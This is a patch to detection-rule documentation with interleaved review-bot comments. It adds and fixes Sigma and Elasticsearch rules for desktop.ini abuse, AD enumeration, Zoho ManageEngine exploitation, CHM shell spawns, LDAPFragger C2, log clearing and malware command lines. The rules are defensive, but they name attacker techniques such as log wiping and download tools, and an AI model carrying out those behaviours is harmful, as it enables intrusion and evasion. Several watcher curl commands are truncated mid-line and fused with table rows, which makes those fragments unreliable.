+((EventID:"11" AND TargetFilename.keyword:*\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\*.sch) AND (NOT (Image.keyword:(*C\\:\\\\windows\\\\system32\\\\svchost.exe* OR *C\\:\\\\windows\\\\system32\\\\dllhost.exe* OR *C\\:\\\\windows\\\\system32\\\\mmc.exe* OR *C\\:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe*))))
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/75bf09fa-1dd7-4d18-9af9-dd9e492562eb <[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003) |
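Review bot: the ATT&CK mapping in the new ADSI-cache rule is inconsistent with itself: `tags` gives `attack.persistence` together with `attack.t1041`, but T1041 (Exfiltration Over Command and Control Channel) belongs to the Exfiltration tactic, and the rule's own references describe LDAPFragger as a C2 channel; either tag `attack.command_and_control` with the matching technique, or `attack.exfiltration` if T1041 really is what is meant. Also `date: 2019/03/24` predates the references it cites (the Fox-IT LDAPFragger post is dated 2020/03/19), so it is presumably a typo for 2020/03/24. Minor: `selection_2` uses `Image|contains` with full paths; `endswith` (or plain equality) states the intent better and does not match paths that merely embed these strings.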
+| **ATT&CK Technique** | - [T1023: Shortcut Modification](https://attack.mitre.org/techniques/T1023)
|
+| **Data Needed** | - [DN_0015_11_windows_sysmon_FileCreate](../Data_Needed/DN_0015_11_windows_sysmon_FileCreate.md)
|
+| **Trigger** | - [T1023: Shortcut Modification](../Triggers/T1023.md)
|
+| **Severity Level** | medium |
+| **False Positives** | - Operations performed through Windows SCCM or equivalent
|
+| **Development Status** | experimental |
+| **References** | - [https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/](https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/)
|
+| **Author** | Maxime Thiebaut (@0xThiebaut) |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: Suspicious desktop.ini Action
+id: 81315b50-6b60-4d8f-9928-3466e1022515
+status: experimental
+description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
+references:
+ - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/
+author: Maxime Thiebaut (@0xThiebaut)
+date: 2020/03/19
+tags:
+ - attack.persistence
+ - attack.t1023
+logsource:
+ product: windows
+ service: sysmon
+detection:
+ filter:
+ Image:
+ - 'C:\Windows\explorer.exe'
+ - 'C:\Windows\System32\msiexec.exe'
+ - 'C:\Windows\System32\mmc.exe'
+ selection:
+ EventID: 11
+ TargetFilename|endswith: '\desktop.ini'
+ condition: selection and not filter
+falsepositives:
+ - Operations performed through Windows SCCM or equivalent
+level: medium
+
+```
+
+
+
+
+
+### es-qs
+
+```
+((EventID:"11" AND TargetFilename.keyword:*\\\\desktop.ini) AND (NOT (Image:("C\\:\\\\Windows\\\\explorer.exe" OR "C\\:\\\\Windows\\\\System32\\\\msiexec.exe" OR "C\\:\\\\Windows\\\\System32\\\\mmc.exe"))))
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/81315b50-6b60-4d8f-9928-3466e1022515 <[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003) |
| **ATT&CK Technique** | - [T1100: Web Shell](https://attack.mitre.org/techniques/T1100)
|
| **Data Needed** | - [DN_0015_11_windows_sysmon_FileCreate](../Data_Needed/DN_0015_11_windows_sysmon_FileCreate.md)
|
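Review bot: in the new Suspicious desktop.ini Action rule (the file added just above this webshell hunk), `description` says it detects processes "accessing desktop.ini", but the selection is Sysmon Event 11 (FileCreate), which is logged only when a file is created or overwritten; reads and in-place edits of an existing desktop.ini produce no event, so reword to "creating or overwriting desktop.ini" and keep the title in line with that. Separately, the mapping to T1023 (Shortcut Modification) is a stretch for a desktop.ini write, since the referenced ISC diary is about altering how Explorer displays a folder rather than modifying a shortcut; if no closer technique exists, say in the description why T1023 was chosen.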
@@ -20,7 +20,7 @@
title: Windows Webshell Creation
id: 39f1f9f2-9636-45de-98f6-a4046aa8e4b9
status: experimental
-description: Posible webshell file creation on a static web site
+description: Possible webshell file creation on a static web site
references:
- PT ESC rule and personal experience
author: Beyu Denis, oscd.community
@@ -77,7 +77,7 @@ falsepositives:
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/39f1f9f2-9636-45de-98f6-a4046aa8e4b9 <[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007) |
+| **ATT&CK Technique** | - [T1087: Account Discovery](https://attack.mitre.org/techniques/T1087)
|
+| **Data Needed** | - [DN_0030_4662_operation_was_performed_on_an_object](../Data_Needed/DN_0030_4662_operation_was_performed_on_an_object.md)
|
+| **Trigger** | - [T1087: Account Discovery](../Triggers/T1087.md)
|
+| **Severity Level** | medium |
+| **False Positives** | - Administrators configuring new users.
|
+| **Development Status** | experimental |
+| **References** | - [https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf](https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)
- [http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html](http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html)
- [https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all](https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all)
|
+| **Author** | Maxime Thiebaut (@0xThiebaut) |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: AD User Enumeration
+id: ab6bffca-beff-4baa-af11-6733f296d57a
+description: Detects access to a domain user from a non-machine account
+status: experimental
+date: 2020/03/30
+author: Maxime Thiebaut (@0xThiebaut)
+references:
+ - https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf
+ - http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html
+ - https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all # For further investigation of the accessed properties
+tags:
+ - attack.discovery
+ - attack.t1087
+logsource:
+ product: windows
+ service: security
+ definition: Requires the "Read all properties" permission on the user object to be audited for the "Everyone" principal
+detection:
+ selection:
+ EventID: 4662
+ ObjectType|contains: # Using contains as the data commonly is structured as "%{bf967aba-0de6-11d0-a285-00aa003049e2}"
+ - 'bf967aba-0de6-11d0-a285-00aa003049e2' # The user class (https://docs.microsoft.com/en-us/windows/win32/adschema/c-user)
+ filter:
+ - SubjectUserName|endswith: '$' # Exclude machine accounts
+ - SubjectUserName|startswith: 'MSOL_' # https://docs.microsoft.com/en-us/azure/active-directory/hybrid/reference-connect-accounts-permissions#ad-ds-connector-account
+ condition: selection and not filter
+falsepositives:
+ - Administrators configuring new users.
+level: medium
+
+```
+
+
+
+
+
+### es-qs
+
+```
+((EventID:"4662" AND ObjectType.keyword:(*bf967aba\\-0de6\\-11d0\\-a285\\-00aa003049e2*)) AND (NOT (SubjectUserName.keyword:*$ OR SubjectUserName.keyword:MSOL_*)))
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/ab6bffca-beff-4baa-af11-6733f296d57a <[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006) |
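Review bot: the `filter` in the new AD User Enumeration rule excludes every `SubjectUserName` ending in `$`, i.e. all computer accounts. That removes the domain controllers' own noise, but it also means enumeration run under a computer account never alerts; document this as a known gap in `description`/`falsepositives`, or narrow the exclusion to the DC accounts. Second, the `definition` line requires a SACL auditing "Read all properties" on user objects for Everyone, which is not a default configuration; the linked Data Needed entry (DN_0030) or a Logging Policy note should carry the same requirement, otherwise the rule is silently dead on most domains. Finally, with that SACL in place every read of a user object by a non-machine account produces a 4662 and the rule has no volume threshold, so `level: medium` will be noisy; the BloodHound reference is about bulk reads, which a `count() by SubjectUserName` over a `timeframe` would capture better than a per-event match.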
@@ -17,7 +17,7 @@
### Sigma rule
```
-title: Judgement Panda Exfil Activity
+title: Judgement Panda Credential Access Activity
id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee
description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
references:
@@ -59,7 +59,7 @@ level: critical
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee <[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md) |
| **Trigger** | - [T1070: Indicator Removal on Host](../Triggers/T1070.md)
|
| **Severity Level** | high |
-| **False Positives** | There are no documented False Positives for this Detection Rule yet |
-| **Development Status** | Development Status wasn't defined for this Detection Rule yet |
+| **False Positives** | |
+| **Development Status** | experimental |
| **References** | - [https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil)
- [https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml](https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml)
- [https://abuse.io/lockergoga.txt](https://abuse.io/lockergoga.txt)
|
| **Author** | @neu5ron, Florian Roth |
| Other Tags | |
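Review bot: this hunk turns the rendered False Positives placeholder into an empty cell (`| **False Positives** | |`) while the hunks below add `falsepositives: - Unknown` to the Sigma block; the empty cell looks like a generator bug, since an "Unknown" entry should render as `- Unknown` in the table the same way other lists in this page render. The CVE-2020-10189 rule added later in this patch shows the same combination (empty cell, `falsepositives: - Unknown` in the rule), so fix the renderer rather than the individual pages.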
@@ -20,6 +20,7 @@
title: Disable of ETW Trace
id: a238b5d0-ce2d-4414-a676-7a531b3d13d6
description: Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.
+status: experimental
references:
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil
- https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml
@@ -44,6 +45,8 @@ detection:
selection_disable_2:
CommandLine: '* set-log* /e:false*'
condition: selection_clear_1 or selection_clear_2 or selection_disable_1 or selection_disable_2
+falsepositives:
+ - Unknown
```
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2020_10189.md b/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2020_10189.md
new file mode 100644
index 0000000..fe2b016
--- /dev/null
+++ b/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2020_10189.md
@@ -0,0 +1,97 @@
+| Title | Exploited CVE-2020-10189 Zoho ManageEngine |
+|:-------------------------|:------------------|
+| **Description** | Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 |
+| **ATT&CK Tactic** | - [TA0001: Initial Access](https://attack.mitre.org/tactics/TA0001)
|
+| **ATT&CK Technique** | - [T1190: Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)
|
+| **Data Needed** | - [DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)
- [DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)
|
+| **Trigger** | - [T1190: Exploit Public-Facing Application](../Triggers/T1190.md)
|
+| **Severity Level** | critical |
+| **False Positives** | |
+| **Development Status** | experimental |
+| **References** | - [https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html](https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html)
- [https://nvd.nist.gov/vuln/detail/CVE-2020-10189](https://nvd.nist.gov/vuln/detail/CVE-2020-10189)
- [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189)
- [https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224](https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224)
|
+| **Author** | Florian Roth |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: Exploited CVE-2020-10189 Zoho ManageEngine
+id: 846b866e-2a57-46ee-8e16-85fa92759be7
+status: experimental
+description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
+references:
+ - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-10189
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189
+ - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224
+author: Florian Roth
+date: 2020/03/25
+tags:
+ - attack.initial_access
+ - attack.t1190
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ ParentImage|endswith: 'DesktopCentral_Server\jre\bin\java.exe'
+ Image|endswith:
+ - '*\cmd.exe'
+ - '*\powershell.exe'
+ - '*\bitsadmin.exe'
+ condition: selection
+falsepositives:
+ - Unknown
+level: critical
+
+```
+
+
+
+
+
+### es-qs
+
+```
+(ParentImage.keyword:*DesktopCentral_Server\\\\jre\\\\bin\\\\java.exe AND Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\bitsadmin.exe))
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/846b866e-2a57-46ee-8e16-85fa92759be7 <[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005) |
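Review bot: In the `detection` block of the new `win_exploit_cve_2020_10189.md`, the `Image|endswith:` values carry a leading wildcard (`- '*\cmd.exe'`, `- '*\powershell.exe'`, `- '*\bitsadmin.exe'`); the `endswith` modifier already anchors the match at the end of the field, so the `*` is redundant (the generated es-qs query collapses it to a single `*` anyway). Drop it, as the `HTML Help Shell Spawn` rule further down in this diff does with `- '\cmd.exe'`. With `level: critical` and `falsepositives: - Unknown`, it would also be worth recording whether legitimate server-side jobs of the `DesktopCentral_Server\jre\bin\java.exe` parent ever spawn `cmd.exe`, since the rule keys entirely on that parent/child pair.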
+| **ATT&CK Technique** | - [T1223: Compiled HTML File](https://attack.mitre.org/techniques/T1223)
|
+| **Data Needed** | - [DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)
- [DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)
|
+| **Trigger** | - [T1223: Compiled HTML File](../Triggers/T1223.md)
|
+| **Severity Level** | high |
+| **False Positives** | |
+| **Development Status** | experimental |
+| **References** | - [https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/)
|
+| **Author** | Maxim Pavlunin |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: HTML Help Shell Spawn
+id: 52cad028-0ff0-4854-8f67-d25dfcbc78b4
+status: experimental
+description: Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)
+references:
+ - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/
+author: Maxim Pavlunin
+date: 2020/04/01
+modified: 2020/04/03
+tags:
+ - attack.execution
+ - attack.defense_evasion
+ - attack.t1223
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ ParentImage: 'C:\Windows\hh.exe'
+ Image|endswith:
+ - '\cmd.exe'
+ - '\powershell.exe'
+ - '\wscript.exe'
+ - '\cscript.exe'
+ - '\regsvr32.exe'
+ - '\wmic.exe'
+ - '\rundll32.exe'
+ condition: selection
+fields:
+ - CommandLine
+ - ParentCommandLine
+falsepositives:
+ - unknown
+level: high
+
+```
+
+
+
+
+
+### es-qs
+
+```
+(ParentImage:"C\\:\\\\Windows\\\\hh.exe" AND Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\wscript.exe OR *\\\\cscript.exe OR *\\\\regsvr32.exe OR *\\\\wmic.exe OR *\\\\rundll32.exe))
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/52cad028-0ff0-4854-8f67-d25dfcbc78b4 <\\ *
```
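Review bot: `ParentImage: 'C:\Windows\hh.exe'` in the HTML Help Shell Spawn rule is an exact path match, so a Windows installation on another drive letter never matches and the rule is silently blind there; `ParentImage|endswith: '\hh.exe'` is the more robust form and is the style the rest of the rule already uses for `Image|endswith`. Minor: `falsepositives: - unknown` is lowercase while the other new rules in this diff use `Unknown`; the generated table renders an empty `| **False Positives** | |` cell in both cases, so pick one spelling for consistency.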
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/f1531fa4-5b84-4342-8f68-9cf3fdbd83d4 <\\\\ *"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "CommandLine.keyword:*\\\\ echo\\\\ EEEE\\\\ >\\\\ *",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'DTRACK Process Creation\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
-CommandLine.keyword:* echo EEEE *
+CommandLine.keyword:* echo EEEE > *
```
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_malware_formbook.md b/Atomic_Threat_Coverage/Detection_Rules/win_malware_formbook.md
index 18841af..0553a81 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/win_malware_formbook.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/win_malware_formbook.md
@@ -62,21 +62,21 @@ level: critical
### es-qs
```
-(ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe OR C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND CommandLine.keyword:(*\\ \\/c\\ del\\ \\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe OR *\\ \\/c\\ del\\ \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe OR *\\ \\/C\\ type\\ nul\\ \\ \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))
+(ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe OR C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND CommandLine.keyword:(*\\ \\/c\\ del\\ \\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe OR *\\ \\/c\\ del\\ \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe OR *\\ \\/C\\ type\\ nul\\ >\\ \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))
```
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/032f5fb3-d959-41a5-9263-4173c802dc2b <\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(ParentCommandLine.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\*.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\*.exe) AND CommandLine.keyword:(*\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\*.exe OR *\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe OR *\\\\ \\\\/C\\\\ type\\\\ nul\\\\ >\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Formbook Process Creation\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
-(ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND CommandLine.keyword:(* \\/c del \\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe * \\/c del \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe * \\/C type nul \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))
+(ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND CommandLine.keyword:(* \\/c del \\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe * \\/c del \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe * \\/C type nul > \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))
```
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_malware_trickbot_recon_activity.md b/Atomic_Threat_Coverage/Detection_Rules/win_malware_trickbot_recon_activity.md
index dbe39d4..a87e5db 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/win_malware_trickbot_recon_activity.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/win_malware_trickbot_recon_activity.md
@@ -24,7 +24,7 @@ description: Trickbot enumerates domain/network topology and executes certain co
references:
- https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/
author: David Burkett
-date: 12/28/2019
+date: 2019/12/28
tags:
- attack.t1482
logsource:
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_multiple_suspicious_cli.md b/Atomic_Threat_Coverage/Detection_Rules/win_multiple_suspicious_cli.md
index 106d061..f0175f4 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/win_multiple_suspicious_cli.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/win_multiple_suspicious_cli.md
@@ -93,7 +93,7 @@ level: low
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/61ab5496-748e-4818-a92f-de78e20fe7f1 <[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md) |
| **Trigger** | - [T1086: PowerShell](../Triggers/T1086.md)
|
| **Severity Level** | high |
-| **False Positives** | There are no documented False Positives for this Detection Rule yet |
+| **False Positives** | |
| **Development Status** | experimental |
| **References** | - [https://twitter.com/mattifestation/status/735261176745988096](https://twitter.com/mattifestation/status/735261176745988096)
- [https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120](https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120)
|
| **Author** | Markus Neis |
@@ -41,8 +41,8 @@ detection:
CommandLine:
- '*amsiInitFailed*'
condition: selection1 and selection2
- falsepositives:
- - Potential Admin Activity
+falsepositives:
+ - Potential Admin Activity
level: high
```
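Review bot: The indentation fix at the end of this hunk (`-  falsepositives:` nested under `detection:` becoming top-level `+falsepositives:` with `- Potential Admin Activity`) is correct, but the first hunk of the same file changes the generated table to an empty `| **False Positives** | |` cell even though the rule now declares a value; the table appears to have been regenerated before the YAML was corrected. Re-run the generator so the table shows `Potential Admin Activity`.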
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_rare_schtask_creation.md b/Atomic_Threat_Coverage/Detection_Rules/win_rare_schtask_creation.md
index b22ed0e..0162576 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/win_rare_schtask_creation.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/win_rare_schtask_creation.md
@@ -56,7 +56,7 @@ level: low
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b20f6158-9438-41be-83da-a5a16ac90c2b <[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003) |
+| **ATT&CK Technique** | - [T1041: Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041)
|
+| **Data Needed** | - [DN_0026_5136_windows_directory_service_object_was_modified](../Data_Needed/DN_0026_5136_windows_directory_service_object_was_modified.md)
|
+| **Trigger** | - [T1041: Exfiltration Over Command and Control Channel](../Triggers/T1041.md)
|
+| **Severity Level** | high |
+| **False Positives** | - Companies, who may use these default LDAP-Attributes for personal information
|
+| **Development Status** | experimental |
+| **References** | - [https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961](https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961)
- [https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/](https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/)
- [https://github.com/fox-it/LDAPFragger](https://github.com/fox-it/LDAPFragger)
|
+| **Author** | xknow @xknow_infosec |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: Suspicious LDAP-Attributes Used
+id: d00a9a72-2c09-4459-ad03-5e0a23351e36
+description: detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.
+status: experimental
+date: 2019/03/24
+author: xknow @xknow_infosec
+references:
+ - https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961
+ - https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/
+ - https://github.com/fox-it/LDAPFragger
+tags:
+ - attack.t1041
+ - attack.persistence
+logsource:
+ product: windows
+ service: security
+detection:
+ selection:
+ EventID: 5136
+ AttributeValue: '*'
+ AttributeLDAPDisplayName:
+ - 'primaryInternationalISDNNumber'
+ - 'otherFacsimileTelephoneNumber'
+ - 'primaryTelexNumber'
+ condition: selection
+falsepositives:
+ - Companies, who may use these default LDAP-Attributes for personal information
+level: high
+
+```
+
+
+
+
+
+### es-qs
+
+```
+(EventID:"5136" AND AttributeValue.keyword:* AND AttributeLDAPDisplayName:("primaryInternationalISDNNumber" OR "otherFacsimileTelephoneNumber" OR "primaryTelexNumber"))
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/d00a9a72-2c09-4459-ad03-5e0a23351e36 <[TA0002: Execution](https://attack.mitre.org/tactics/TA0002) |
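Review bot: `date: 2019/03/24` in the new LDAPFragger rule predates every reference it cites (the fox-it post URL carries `2020/03/19`), so the year looks like a typo for 2020. Separately, the tags `- attack.t1041` and `- attack.persistence` contradict each other: T1041 is an Exfiltration technique, which the generated table itself shows as `[T1041: Exfiltration Over Command and Control Channel]` next to a Persistence tactic, and the description is about C2 over LDAP attributes, so the tactic tag should agree with the technique chosen. `AttributeValue: '*'` adds only a field-exists check (`AttributeValue.keyword:*` in es-qs) and can be dropped without changing what the rule matches.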
+| **ATT&CK Technique** | - [T1086: PowerShell](https://attack.mitre.org/techniques/T1086)
|
+| **Data Needed** | - [DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)
- [DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)
|
+| **Trigger** | - [T1086: PowerShell](../Triggers/T1086.md)
|
+| **Severity Level** | high |
+| **False Positives** | |
+| **Development Status** | experimental |
+| **References** | - [https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html](https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html)
|
